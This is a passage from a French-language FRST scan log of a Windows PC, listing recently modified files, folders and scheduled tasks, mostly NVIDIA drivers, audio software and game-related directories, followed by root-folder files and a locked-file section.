2021-12-25 23:00 - 2021-10-20 21:59 - 000000000 ____D C:\Users\Shadow\Documents\My Games 2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VB Audio 2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VB Audio 2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\Program Files\VB 2021-12-25 22:06 - 2021-10-25 17:21 - 000006176 _____ C:\Users\Shadow\AppData\Roaming\VoiceMeeterDefault.xml 2021-12-25 17:34 - 2020-07-28 15:20 - 000000000 ____D C:\Program Files\Blade Group 2021-12-25 17:33 - 2021-11-03 13:13 - 000000019 ____H C:\.svs_fs_delta_00_62fd92f3-b0d8-4d12-b4de-0bdf16e57ad2 2021-12-25 17:33 - 2021-10-18 19:07 - 000000019 ____H C:\.svs_fs_delta_00_aa725710-f0b4-4d97-9b45-4a19aad82f3a 2021-12-25 17:33 - 2021-10-18 19:07 - 000000019 ____H C:\.svs_fs_delta_00_3d16fcca-a48f-497d-82aa-6191ccb35463 2021-12-24 20:53 - 2021-12-01 00:10 - 000000000 ____D C:\Users\Shadow\AppData\Local\Bohemia_Interactive 2021-12-24 20:53 - 2021-10-19 13:09 - 000000000 ____D C:\Users\Shadow\AppData\Local\BattlEye 2021-12-23 01:27 - 2021-10-18 20:00 - 000003976 _____ C:\Windows\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:27 - 2021-10-18 20:00 - 000003940 _____ C:\Windows\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:27 - 2021-10-18 20:00 - 000001443 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2021-12-23 01:26 - 2021-10-18 20:00 - 000004308 _____ C:\Windows\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003894 _____ C:\Windows\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2021-10-18 20:00 - 000003654 _____ C:\Windows\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-23 01:26 - 2020-07-28 11:40 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2021-12-23 01:26 - 2020-07-28 11:39 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2021-12-21 23:14 - 2021-11-07 20:20 - 000000000 ____D C:\Program Files (x86)\Overwolf 2021-12-19 22:43 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2021-12-18 00:37 - 2020-07-28 09:55 - 000257912 _____ C:\Windows\system32\FNTCACHE.DAT 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SystemResources 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\setup 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\oobe 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lv-LV 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lt-LT 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\et-EE 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\es-MX 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\Provisioning 2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\bcastdvr 2021-12-17 22:33 - 2020-07-28 12:10 - 137938848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2021-12-17 22:33 - 2020-07-28 12:10 - 000000000 ____D C:\Windows\system32\MRT 2021-12-16 22:46 - 2021-10-18 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Local\SquirrelTemp 2021-12-15 21:57 - 2021-12-03 19:44 - 001112336 _____ C:\Windows\system32\vulkan-1.dll 2021-12-15 21:54 - 2021-10-18 19:09 - 000658344 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll 2021-12-15 21:53 - 2021-12-03 19:37 - 000982952 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll 2021-12-15 21:53 - 2021-12-03 19:37 - 000794024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll 2021-12-15 21:50 - 2020-07-28 11:40 - 007586784 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll 2021-12-15 17:05 - 2020-07-28 09:55 - 000000000 ____D C:\Windows\system32\Drivers\wd 2021-12-11 00:31 - 2021-10-19 16:12 - 000003634 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2021-12-11 00:31 - 2021-10-19 16:12 - 000003510 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2021-12-10 16:24 - 2021-11-19 22:24 - 000000000 ____D C:\Users\Shadow\Desktop\Programmation ==================== Fichiers à la racine de certains dossiers ======== 2021-10-18 20:12 - 2021-12-04 17:58 - 000000032 _____ () C:\Users\Shadow\AppData\Roaming\.machineId 2021-10-26 23:45 - 2021-10-27 22:43 - 000012288 _____ () C:\Users\Shadow\AppData\Roaming\emp.bin 2021-12-10 16:28 - 2021-12-10 16:28 - 000000000 _____ () C:\Users\Shadow\AppData\Roaming\Spyder.launch.pyw.log 2021-10-25 17:21 - 2021-12-25 22:06 - 000006176 _____ () C:\Users\Shadow\AppData\Roaming\VoiceMeeterDefault.xml ==================== FLock ============================== 2021-12-25 17:33 C:\.svs_fs_delta_00_3d16fcca-a48f-497d-82aa-6191ccb35463 2021-12-25 17:33 C:\.svs_fs_delta_00_62fd92f3-b0d8-4d12-b4de-0bdf16e57ad2 2021-12-25 17:33 C:\.svs_fs_delta_00_aa725710-f0b4-4d97-9b45-4a19aad82f3a ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) ==================== Fin de FRST.txt ========================